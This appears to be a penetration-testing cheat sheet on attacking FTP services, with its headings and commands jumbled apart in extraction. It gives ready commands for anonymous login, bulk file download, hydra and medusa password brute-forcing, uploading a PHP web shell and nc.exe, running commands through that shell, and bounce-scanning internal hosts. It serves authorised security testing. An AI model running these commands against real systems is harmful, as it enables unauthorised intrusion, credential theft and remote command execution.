Service Detection
Banner Grab
Anonymous Login
Download Everything
Enumeration
List Files
Download File
Upload File
Binary Mode (for executables)
Brute-Force
Interesting Files
Look for:.htpasswdweb.configbackup.zip*.conf- SSH keys
- Database dumps
Documentation Index
Fetch the complete documentation index at: /llms.txt
Use this file to discover all available pages before exploring further.
FTP enumeration and exploitation: anonymous login, credential brute-force, file upload, and bounce attacks.
nmap -sV -sC -p 21 TARGET
nc -nv TARGET 21
ftp TARGET
# Username: anonymous
# Password: (empty or any email)
ftp -a TARGET
wget -r ftp://anonymous:anonymous@TARGET/
ftp> ls -la
ftp> dir
ftp> get file.txt
ftp> mget *.txt
ftp> put shell.php
ftp> mput *.txt
ftp> binary
ftp> put nc.exe
hydra -L users.txt -P passwords.txt ftp://TARGET
medusa -h TARGET -U users.txt -P passwords.txt -M ftp
.htpasswdweb.configbackup.zip*.confnmap -Pn -b anonymous:anonymous@FTP_SERVER INTERNAL_TARGET
ftp> put shell.php
http://TARGET/shell.php?cmd=id
nmap -p 21 --script ftp-anon TARGET
nmap -p 21 --script ftp-brute TARGET
nmap -p 21 --script ftp-vuln* TARGET
| Check | Command |
|---|---|
| Anonymous login | ftp -a TARGET |
| Brute-force | hydra -L users.txt -P pass.txt ftp://TARGET |
| Download all | wget -r ftp://anonymous:@TARGET/ |
| Bounce scan | nmap -b user:pass@FTP INTERNAL |